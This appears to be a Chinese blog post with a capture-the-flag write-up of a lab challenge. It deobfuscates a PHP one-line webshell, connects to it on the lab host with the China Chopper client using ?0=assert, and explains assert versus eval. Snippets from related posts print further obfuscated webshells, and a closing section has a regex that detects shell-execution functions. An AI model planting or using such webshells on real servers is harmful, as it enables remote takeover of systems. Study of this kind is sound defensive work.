墨者 - PHP代码分析溯源(第1题)

最新推荐文章于 2022-01-16 15:25:29 发布
最新推荐文章于 2022-01-16 15:25:29 发布
阅读量741 收藏 1
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39936434/article/details/95591629
本文围绕PHP代码展开,通过在线调试工具处理PHP源码变种的一句话木马,利用菜刀链接获取key。还深入探讨了assert和eval函数的区别,前者是可变函数,后者是语言构造器,且在不同PHP版本功能有差异。最后解释了题目中参数代码的含义,解决了相关困惑。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

进入环境,发现是php源码

用在线php代码调试工具调试(要用echo输出,将${$__}[!$_](${$___}[$_]);删掉,否则报错)

结合输出, ${$__}[!$_](${$___}[$_]); 的意思大概是

<?php $_GET[0]($_POST[1])?>

这是php一句话木马的变种

其他更多变种参考:https://blog.youkuaiyun.com/xiaoshan812613234/article/details/41743189

接下来就是菜刀无惧链接了,http://219.153.49.228:46361/b.php?0=assert

 拿到key

如果连不上,不要怀疑方法的问题,是菜刀版本问题......

请换一把菜刀,不要问我是怎么知道的。。。。

总结

   操作可谓是相当简单,但也只是上网找的教程照做而已。心中还有不少困惑,知其意而不明其义。

   一开始,博主很好奇,因为姆语言不是php,不明白为什么会出现一个assert参数,也不明白为什么要0=assert,

   在题目中也是没提示,于是上网深扒。

   在https://www.cnblogs.com/sijidou/p/9168496.html这个解题博客中,发现一句木马的新玩法,不但能通过密码链接,

   还可以直接通告url调动系统函数例如phpInfo(),这里也发现了assert和eval函数的区别。

assert和eval函数的区别

    assert和eval都是可以直接执行括号里的任意代码的,唯一不同的是eval是直接编译的语言构造器,可直接调用echo等可变函数,而assert是一个可变函数,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。但值得注意的是不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构。这里具体可以参考:https://www.cnblogs.com/iamstudy/articles/analysis_eval_and_assert.html

     assert这个函数可以在括号里输入任意字符串代码,代码就会被执行,例如

<?php assert('system('ls')');?>

     和eval函数一样, 代码会被执行

     但是这个可以执行任意字符串代码的功能只能php 5 才可以用,php 7以上assert变成了一种语言结构而不是一个函数,

也就是说像eval一样不支持可变函数。

   具体参考链接:https://www.smi1e.top/%E6%B5%85%E8%B0%88eval%E5%92%8Cassert/

   大概明白了assert和eval的区别与用法,但是根本问题没解决,为什么要用到0=assert。

   直到我再翻回之前看过得博客https://www.cnblogs.com/sijidou/p/9168496.html,才恍然大悟,$_GET[1]是用GET的方式

从页面的url获取方法名字为“0”的值assert,现在尝试解释一下题目的参数代码意思

   上面题目的一句话木马

<?php $_GET[0]($_POST[1])?>

  $_GET[0] 获取以GET的方式从页面的url获取了方法名字为“0”的值assert,就会变成以下代码'

<?php assert($_POST[1])?>

   变成了一句话木马的原型

   而且里面的$_POST[1]也可以自由控制参数,什么都不传就是密码为1,菜刀链接上去。

   也可以执行操作,例如用HackBar访问题目网址

 其实这个url的转换到后台的执行是

<?php assert('phpinfo()')?>

 到此,所有困惑已经解决。

墨者学院 - PHP代码分析溯源(1)
多崎巡礼的博客
07-30 929
1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。 2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。 3、$__=("`"^"?").(":"^"}").("%.
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 876
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.youkuaiyun.com/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
PHP代码分析溯源(1)
mozhe_的博客
05-25 1730
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码,经分析:1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中...
墨者学院-PHP代码分析溯源(1)
JimWu的博客
09-04 482
PHP代码分析溯源(1) 难易程度:★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.访问网页,得到php代码 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[...
墨者学院 - WebShell代码分析溯源(第8)
多崎巡礼的博客
08-05 769
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。 C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php   &lt;?php error_reporting(0); ...
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 875
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   &lt;?php...
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 758
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
墨者学院 - PHP代码分析溯源(第3)
多崎巡礼的博客
08-03 759
在for 循环中是判断输入的字符是否有存在在1和9之间的数字 如果不存在判断是否等于54975581388 等于则绕过 即 又不能等于数字1-9又要等于54975581388 但是这里在比较的时候就是用弱类型的,所以不要求完全一致。 php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc 键入 0xccccccccc 输入得到key...
墨者学院靶场之PHP代码分析溯源(1)
weixin_30892037的博客
06-11 209
申请靶场环境后 点开目 一段奇怪的PHP代码 因为我自己电脑重装了win10系统,php+apache+mysql的环境本地主机觉得没必要弄了,于是我们用在线的PHP编码(百度一下到处都是) 复制进去以";"来排个格式 运行下,报错。 看看源码,"$_" "$__" "$___" 这三个是变量名,我们用echo输出下内容 连在一起了,但是可以确定 ...
墨者学院-php分析溯源
qq_37850901的博客
09-26 289
将网站源代码下载完毕,使用d盾进行扫描,发现webshell 查看里面的代码,解析md5,密码x,使用菜刀连接http://219.153.49.228:42133/shell.php?a=1Q2W3E 在根目录找到key.txt,提交验证。 ...
墨者学院-php代码分析溯源
臭nana的博客
12-14 432
打开发现代码是base64+压缩的编码 最简单的方式是将eval变成echo,其他方法 得到echo `$_REQUEST[a]`;; ?&gt; 构造payload:?a=ls,发现key文件   用了ls就明白这是肯定不是在windows系统,所以不能用file_get_contents 两种方法: 1.使用cat不能直接读取出来,但可以查看源代码,在前面加view-...
墨者学院 - PHP代码分析溯源(第2)
多崎巡礼的博客
07-30 1344
根据干看了好久的php隐式转换。。。 还是毫无头绪。。。 这样的逻辑几乎是无解的。。。 md5(QNKCDZO,32) = 0e830400451993494058024219903391   根据PHP Hash比较存在缺陷 http://www.freebuf.com/news/67007.html 。。。在这道中,最重要的一句话就是: 根据php的隐式转换可以知道 o...
墨者学院--PHP代码分析溯源2
weixin_44382289的博客
09-04 210
1.依照目,点击下载源码; 2.分析源码; 从源码中我们可以看出,在a不等于qnkcdzo且a1等于a2时成功; a1为qnkcdzo的md5加密,所以a2为加密后与a1比较相等的值; 由于隐式转换,qnkcdzo就加密后的值等效于0*10^0,所以只要加密后也为这个值就可以了; 在这里我使用了240610708 //这的原理是PHP处理0e开头的md5哈希字符串的缺陷(有兴趣的可自行查阅资...
墨者PHP代码分析溯源(第4)
zr1213159840的博客
01-16 772
首先打开页面,有个提示,而且还有段代码 仔细看下这段代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?> 能看出来首先是一段字符进行了解码,通过末尾的等于能看出来这是一段base64的解码,然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩,那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对ev
墨者学院WebShell文件上传漏洞分析溯源(1)
最新发布
04-03
### 墨者学院 WebShell 文件上传漏洞分析与溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕过安全机制,在服务器上放置恶意脚本。 在墨者学院的相关目中提到的内容涉及多个方面,包括 MIME 类型篡改、禁用 JavaScript 绕过前端验证以及利用后缀名规避检测等技术[^1]。 --- #### 漏洞成因分析 文件上传漏洞的主要原因在于服务端对上传文件的安全校验不足。具体表现为以下几个方面: 1. **MIME 类型校验不严格** 攻击者可以使用工具(如 Burp Suite)抓取 HTTP 请求并修改其 MIME 类型字段,从而绕过基于内容类型的限制。例如,将 `.txt` 文件伪装为 `image/jpeg` 格式的图片文件。 2. **依赖客户端验证** 如果仅依靠浏览器端的 JavaScript 验证来阻止非法文件类型,则容易被禁用或绕过。一旦禁用了 JavaScript 功能,就可以轻松提交不符合预期规则的文件[^2]。 3. **扩展名校验缺陷** 当某些应用只检查文件名而未深入解析实际内容时,可能会接受带有特殊后缀名(比如 `.php5`, `.pht` 等变种 PHP 扩展)的文件作为合法输入[^3]。这使得即使表面上看似正常的文件也可能隐藏潜在威胁。 --- #### 解决方案建议 为了有效防范此类问的发生,可以从以下几方面着手改进防护措施: - 加强服务端逻辑设计, 不应单纯信任来自用户的任何数据; - 对于上传过程实施多重过滤策略, 如限定白名单内的 mime-type 和尺寸范围之外还需确认最终存储形式确实无害; - 定期审查现有代码库寻找可能存在的安全隐患点,并及时修补已知漏洞; 以下是实现上述部分功能的一个 Python 示例演示如何初步判断一个给定字符串是否可能是危险命令执行语句的一部分: ```python import re def is_potentially_dangerous(input_string): pattern = r'(?:exec|passthru|shell_exec|system|proc_open|popen)' match_result = re.search(pattern, input_string.lower()) return bool(match_result) test_strings = ["<?php echo 'hello'; ?>", "<?php system('ls'); ?>"] for s in test_strings: print(f"'{s}' -> {is_potentially_dangerous(s)}") ``` 此函数会返回 True 或 False 表明传入参数是否存在可疑的关键字组合。 --- #### 总结 通过对墨者学院案例的学习可以看出,针对 web shell 的防御工作需要综合考虑多层面的因素,从前端界面交互直至后台数据库操作均需保持高度警惕以防万一环节疏漏造成严重后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值